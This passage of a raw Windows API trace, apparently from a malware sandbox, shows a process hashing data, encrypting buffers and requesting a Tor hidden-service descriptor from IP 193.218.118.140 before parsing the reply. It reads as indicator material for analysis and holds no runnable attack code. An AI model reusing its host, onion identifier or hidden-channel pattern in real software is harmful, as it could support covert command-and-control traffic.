phContext=0x3d81944, fQOP=0x0, pMessage=0x339f9dc, MessageSeqNo=0x0 | out: pMessage=0x339f9dc) returned 0x0 [0142.074] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0142.075] free (_Block=0x3df0420) [0142.075] free (_Block=0x0) [0142.075] free (_Block=0x60cdc0) [0142.075] GetTickCount () returned 0x11646d4 [0142.075] malloc (_Size=0x10) returned 0x3648ce0 [0142.075] free (_Block=0x0) [0142.075] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ce0*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0142.075] free (_Block=0x3648ce0) [0142.075] GetTickCount () returned 0x11646d4 [0142.075] malloc (_Size=0x10) returned 0x3648d10 [0142.075] free (_Block=0x0) [0142.076] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d10*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0142.437] free (_Block=0x3648d10) [0142.437] GetTickCount () returned 0x116483c [0142.437] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969c9 [0142.437] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa64 | out: phHash=0x339fa64) returned 1 [0142.437] CryptHashData (hHash=0x4329b8, pbData=0x339fa9c, dwDataLen=0x5, dwFlags=0x0) returned 1 [0142.437] malloc (_Size=0x14) returned 0x3f65340 [0142.437] free (_Block=0x0) [0142.437] CryptGetHashParam (in: hHash=0x4329b8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339fa5c, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339fa5c) returned 1 [0142.437] CryptDestroyHash (hHash=0x4329b8) returned 1 [0142.437] malloc (_Size=0x10) returned 0x3648da0 [0142.437] free (_Block=0x0) [0142.437] malloc (_Size=0x44) returned 0x3df0030 [0142.437] free (_Block=0x3648da0) [0142.437] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339faa4 | out: phHash=0x339faa4) returned 1 [0142.437] CryptHashData (hHash=0x4327f8, pbData=0x3df0030, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0142.437] malloc (_Size=0x14) returned 0x3f65520 [0142.437] free (_Block=0x0) [0142.437] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65520, pdwDataLen=0x339fa9c, dwFlags=0x0 | out: pbData=0x3f65520, pdwDataLen=0x339fa9c) returned 1 [0142.437] CryptDestroyHash (hHash=0x4327f8) returned 1 [0142.437] free (_Block=0x3df0030) [0142.438] free (_Block=0x3f65340) [0142.438] malloc (_Size=0x21) returned 0x60dcd8 [0142.438] free (_Block=0x0) [0142.438] _vscprintf (_Format="/tor/rendezvous2/%s", _ArgList=0x339fafc) returned 49 [0142.438] malloc (_Size=0x32) returned 0x36242f0 [0142.438] free (_Block=0x0) [0142.438] vsprintf_s (in: _DstBuf=0x36242f0, _SizeInBytes=0x32, _Format="/tor/rendezvous2/%s", _ArgList=0x339fafc | out: _DstBuf="/tor/rendezvous2/oj2t3r2p35hzpnnscqbu4obn6zhjmelb") returned 49 [0142.438] free (_Block=0x60dcd8) [0142.438] free (_Block=0x3f65520) [0142.438] inet_ntoa (in=0x8c76dac1) returned="193.218.118.140" [0142.438] malloc (_Size=0x10) returned 0x3648c80 [0142.438] free (_Block=0x0) [0142.438] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339faa0) returned 89 [0142.438] malloc (_Size=0x5a) returned 0x60e560 [0142.438] free (_Block=0x0) [0142.438] vsprintf_s (in: _DstBuf=0x60e560, _SizeInBytes=0x5a, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339faa0 | out: _DstBuf="GET /tor/rendezvous2/oj2t3r2p35hzpnnscqbu4obn6zhjmelb HTTP/1.0\r\nHost: 193.218.118.140\r\n\r\n") returned 89 [0142.438] malloc (_Size=0x5a) returned 0x60e358 [0142.438] free (_Block=0x0) [0142.438] free (_Block=0x0) [0142.438] malloc (_Size=0x1fd) returned 0x3df0420 [0142.438] free (_Block=0x0) [0142.439] CryptHashData (hHash=0x432d78, pbData=0x3df0420, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.439] CryptDuplicateHash (in: hHash=0x432d78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339f9bc | out: phHash=0x339f9bc) returned 1 [0142.439] malloc (_Size=0x14) returned 0x3f651e0 [0142.439] free (_Block=0x0) [0142.439] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x339f954, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x339f954) returned 1 [0142.439] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.439] free (_Block=0x3f651e0) [0142.439] malloc (_Size=0x1fd) returned 0x3def350 [0142.439] free (_Block=0x0) [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.439] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.440] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] malloc (_Size=0x1fd) returned 0x3def558 [0142.441] free (_Block=0x0) [0142.441] free (_Block=0x0) [0142.441] free (_Block=0x3def350) [0142.441] free (_Block=0x3df0420) [0142.441] malloc (_Size=0x1fd) returned 0x3def350 [0142.441] free (_Block=0x0) [0142.441] malloc (_Size=0x1fd) returned 0x3df0420 [0142.441] free (_Block=0x0) [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.441] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.442] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.443] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f90c*=0x10) returned 1 [0142.443] malloc (_Size=0x1fd) returned 0x60cdc0 [0142.443] free (_Block=0x0) [0142.443] free (_Block=0x3def558) [0142.443] free (_Block=0x3df0420) [0142.443] free (_Block=0x3def350) [0142.443] malloc (_Size=0x202) returned 0x3df0420 [0142.443] free (_Block=0x0) [0142.443] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339f944, MessageSeqNo=0x0 | out: pMessage=0x339f944) returned 0x0 [0142.443] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0142.444] free (_Block=0x3df0420) [0142.444] free (_Block=0x60e358) [0142.444] free (_Block=0x60cdc0) [0142.444] Sleep (dwMilliseconds=0xa) [0142.459] Sleep (dwMilliseconds=0xa) [0142.518] Sleep (dwMilliseconds=0xa) [0142.594] Sleep (dwMilliseconds=0xa) [0142.663] Sleep (dwMilliseconds=0xa) [0142.727] Sleep (dwMilliseconds=0xa) [0142.777] Sleep (dwMilliseconds=0xa) [0142.876] free (_Block=0x3f68010) [0142.876] malloc (_Size=0xd71) returned 0x60cdc0 [0142.876] free (_Block=0x0) [0142.876] Sleep (dwMilliseconds=0xa) [0142.915] Sleep (dwMilliseconds=0xa) [0142.971] Sleep (dwMilliseconds=0xa) [0143.048] free (_Block=0x0) [0143.048] malloc (_Size=0xcba) returned 0x3f68010 [0143.048] free (_Block=0x0) [0143.048] free (_Block=0x60cdc0) [0143.048] free (_Block=0x60e560) [0143.048] free (_Block=0x3648c80) [0143.049] malloc (_Size=0xcba) returned 0x60cdc0 [0143.049] free (_Block=0x0) [0143.049] malloc (_Size=0x3f) returned 0x3e22398 [0143.049] free (_Block=0x0) [0143.049] malloc (_Size=0x40) returned 0x3e22230 [0143.049] free (_Block=0x0) [0143.049] free (_Block=0x0) [0143.049] memchr (_Buf=0x60cdff, _Val=10, _MaxCount=0xc7a) returned 0x60ce08 [0143.049] malloc (_Size=0xa) returned 0x3648f08 [0143.049] free (_Block=0x0) [0143.049] free (_Block=0x0) [0143.049] memchr (_Buf=0x60ce09, _Val=10, _MaxCount=0xc70) returned 0x60ce16 [0143.049] malloc (_Size=0xe) returned 0x3648cb0 [0143.049] free (_Block=0x0) [0143.049] free (_Block=0x0) [0143.049] memchr (_Buf=0x60ce17, _Val=10, _MaxCount=0xc62) returned 0x60ce35 [0143.049] malloc (_Size=0x1f) returned 0x3d803f0 [0143.049] free (_Block=0x0) [0143.049] free (_Block=0x0) [0143.049] memchr (_Buf=0x60ce36, _Val=10, _MaxCount=0xc43) returned 0x60ce76 [0143.049] malloc (_Size=0x41) returned 0x3defc20 [0143.049] free (_Block=0x0) [0143.050] malloc (_Size=0x140) returned 0x3dd4500 [0143.050] free (_Block=0x3e22230) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60ce77, _Val=10, _MaxCount=0xc02) returned 0x60ceb7 [0143.050] malloc (_Size=0x41) returned 0x3defd60 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60ceb8, _Val=10, _MaxCount=0xbc1) returned 0x60cef4 [0143.050] malloc (_Size=0x3d) returned 0x3e22548 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60cef5, _Val=10, _MaxCount=0xb84) returned 0x60cf11 [0143.050] malloc (_Size=0x1d) returned 0x3d802d8 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60cf12, _Val=10, _MaxCount=0xb67) returned 0x60cf41 [0143.050] malloc (_Size=0x30) returned 0x36249c0 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60cf42, _Val=10, _MaxCount=0xb37) returned 0x60cf66 [0143.050] malloc (_Size=0x25) returned 0x60de88 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60cf67, _Val=10, _MaxCount=0xb12) returned 0x60cf7c [0143.050] malloc (_Size=0x16) returned 0x3f65460 [0143.050] free (_Block=0x0) [0143.050] free (_Block=0x0) [0143.050] memchr (_Buf=0x60cf7d, _Val=10, _MaxCount=0xafc) returned 0x60cf90 [0143.050] malloc (_Size=0x14) returned 0x3f65280 [0143.050] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60cf91, _Val=10, _MaxCount=0xae8) returned 0x60cfa8 [0143.051] malloc (_Size=0x18) returned 0x3f65380 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60cfa9, _Val=10, _MaxCount=0xad0) returned 0x60cfe9 [0143.051] malloc (_Size=0x41) returned 0x3deffe0 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60cfea, _Val=10, _MaxCount=0xa8f) returned 0x60d02a [0143.051] malloc (_Size=0x41) returned 0x3defd10 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60d02b, _Val=10, _MaxCount=0xa4e) returned 0x60d06b [0143.051] malloc (_Size=0x41) returned 0x3defdb0 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60d06c, _Val=10, _MaxCount=0xa0d) returned 0x60d0ac [0143.051] malloc (_Size=0x41) returned 0x3defe00 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60d0ad, _Val=10, _MaxCount=0x9cc) returned 0x60d0ed [0143.051] malloc (_Size=0x41) returned 0x3defa40 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60d0ee, _Val=10, _MaxCount=0x98b) returned 0x60d12e [0143.051] malloc (_Size=0x41) returned 0x3defe50 [0143.051] free (_Block=0x0) [0143.051] free (_Block=0x0) [0143.051] memchr (_Buf=0x60d12f, _Val=10, _MaxCount=0x94a) returned 0x60d16f [0143.052] malloc (_Size=0x41) returned 0x3defae0 [0143.052] free (_Block=0x0) [0143.052] free (_Block=0x0) [0143.052] memchr (_Buf=0x60d170, _Val=10, _MaxCount=0x909) returned 0x60d1b0 [0143.052] malloc (_Size=0x41) returned 0x3deff90 [0143.052] free (_Block=0x0) [0143.052] malloc (_Size=0x540) returned 0x3def350 [0143.052] free (_Block=0x3dd4500) [0143.052] free (_Block=0x0) [0143.052] memchr (_Buf=0x60d1b1, _Val=10, _MaxCount=0x8c8) returned 0x60d1f1 [0143.052] malloc (_Size=0x41) returned 0x3defea0 [0143.052] free (_Block=0x0) [0143.052] free (_Block=0x0) [0143.052] memchr (_Buf=0x60d1f2, _Val=10, _MaxCount=0x887) returned 0x60d232 [0143.052] malloc (_Size=0x41) returned 0x3defa90 [0143.052] free (_Block=0x0) [0143.052] free (_Block=0x0) [0143.052] memchr (_Buf=0x60d233, _Val=10, _MaxCount=0x846) returned 0x60d273 [0143.052] malloc (_Size=0x41) returned 0x3def9a0 [0143.052] free (_Block=0x0) [0143.052] free (_Block=0x0) [0143.052] memchr (_Buf=0x60d274, _Val=10, _MaxCount=0x805) returned 0x60d2b4 [0143.052] malloc (_Size=0x41) returned 0x3defef0 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] 